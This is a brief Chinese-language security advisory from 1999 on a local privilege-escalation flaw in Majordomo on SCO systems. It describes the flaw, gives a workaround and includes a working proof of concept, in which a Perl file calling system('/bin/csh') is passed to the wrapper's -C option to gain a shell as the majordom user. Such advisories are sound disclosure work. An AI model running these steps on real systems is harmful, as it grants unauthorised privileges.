Majordomo Local -C 参数漏洞发布时间:1999-12-29 更新时间:1999-12-29 严重程度:中 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 SCO详细描述 本地用户可以利用此漏洞获得majordomo的权限。 测试代码 可以用以下方式测试: shevek@tirin ~$ cat foo.pl system("/bin/csh"); shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl % %whoami majordom 解决方案 一个临时的解决办法是将majordomo的可执行位去除。 相关信息 |